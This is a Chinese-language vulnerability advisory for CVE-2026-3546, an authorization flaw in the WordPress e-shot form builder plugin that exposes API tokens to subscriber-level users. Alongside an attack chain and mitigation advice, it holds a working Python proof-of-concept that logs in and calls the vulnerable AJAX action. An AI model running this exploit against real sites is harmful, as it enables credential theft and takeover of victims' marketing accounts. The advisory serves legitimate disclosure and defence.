CVE-2026-3546 CVSS 5.3 中危

CVE-2026-3546 WordPress e-shot插件信息泄露漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3546

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress e-shot form builder plugin

漏洞概述

WordPress的e-shot form builder插件在1.0.2及以下版本中存在敏感信息泄露漏洞。由于`eshot_form_builder_get_account_data`函数缺乏权限验证，低权限用户可利用AJAX接口获取存储在数据库中的API令牌及子账户信息，进而危及e-shot平台账户安全。

技术细节

该漏洞位于插件的AJAX处理逻辑中。`eshot_form_builder_get_account_data`函数被注册为`wp_ajax_`处理器，仅要求用户登录，未进行`current_user_can`等能力检查或Nonce验证。该函数直接查询`eshotformbuilder_control`表，获取并返回e-shot API Token及子账户数据。攻击者只需拥有订阅者权限，即可构造请求读取敏感配置，导致凭证泄露。

攻击链分析

STEP 1

枚举用户

攻击者确认目标使用了存在漏洞的e-shot form builder插件，并注册或获取一个低权限（如订阅者）账户。

STEP 2

身份认证

攻击者使用获取的凭证登录WordPress，获取有效的会话Cookie。

STEP 3

发送请求

攻击者向/wp-admin/admin-ajax.php发送POST请求，参数包含action=eshot_form_builder_get_account_data。

STEP 4

获取数据

服务器返回JSON响应，包含数据库中的e-shot API Token和子账户敏感信息。

STEP 5

接管账户

攻击者利用泄露的API Token访问受害者的e-shot营销平台账户，发送恶意邮件或窃取联系人。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
import requests

# Target configuration
target_url = "https://example.com"
username = "subscriber"
password = "password"

# 1. Login to get cookies
login_url = f"{target_url}/wp-login.php"
session = requests.Session()
login_data = {
    "log": username,
    "pwd": password,
    "redirect_to": f"{target_url}/wp-admin/",
    "wp-submit": "Log In"
}
session.post(login_url, data=login_data)

# 2. Exploit AJAX endpoint
ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
payload = {
    "action": "eshot_form_builder_get_account_data"
}

response = session.post(ajax_url, data=payload)

if response.status_code == 200:
    print("[+] Exploit successful!")
    print("[+] Sensitive Data:")
    print(response.json())
else:
    print("[-] Exploit failed")

影响范围

e-shot form builder <= 1.0.2

防御指南

临时缓解措施

建议立即检查并升级该插件。若暂无法升级，应通过Web服务器规则或WAF拦截包含action=eshot_form_builder_get_account_data的请求，或暂时禁用该插件以防止数据泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表